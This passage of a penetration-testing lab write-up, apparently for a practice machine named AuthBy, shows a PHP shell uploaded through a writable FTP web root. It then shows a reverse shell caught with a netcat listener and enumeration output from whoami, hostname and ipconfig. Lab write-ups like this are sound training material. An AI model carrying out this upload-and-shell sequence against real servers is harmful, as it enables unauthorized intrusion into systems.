Arbitrary File Upload
The target web server is running a single page PHP web application and the web root directory is directly mapped to the FTP server on the target port 21. Given that write access is permitted, I can upload a PHP payload directly on to the web root directly via the FTP server
ftp> pwd
Remote directory: /
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||2139|)
150 File status okay; about to open data connection.
100% |*******************************************************************************************| 9296 123.12 MiB/s 00:00 ETA
226 Closing data connection.
9296 bytes sent in 00:00 (149.36 KiB/s)Upload complete
/Practice/AuthBy/3-Exploitation/attachments/{3AC2FA82-5A50-4A96-BD0A-2814D65AC92A}.png)
Triggering the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ nnc 242
listening on [any] 242 ...
connect to [192.168.45.245] from (UNKNOWN) [192.168.203.46] 49176
SOCKET: Shell has connected! PID: 3016
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\wamp\bin\apache\Apache2.2.21> whoami
livda\apache
C:\wamp\bin\apache\Apache2.2.21> hostname
LIVDA
C:\wamp\bin\apache\Apache2.2.21> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::2d12:cfc9:2a58:43c4%12
IPv4 Address. . . . . . . . . . . : 192.168.203.46
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.203.254
Tunnel adapter Local Area Connection*:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : Initial Foothold established to the target system as the apache account via arbitrary file upload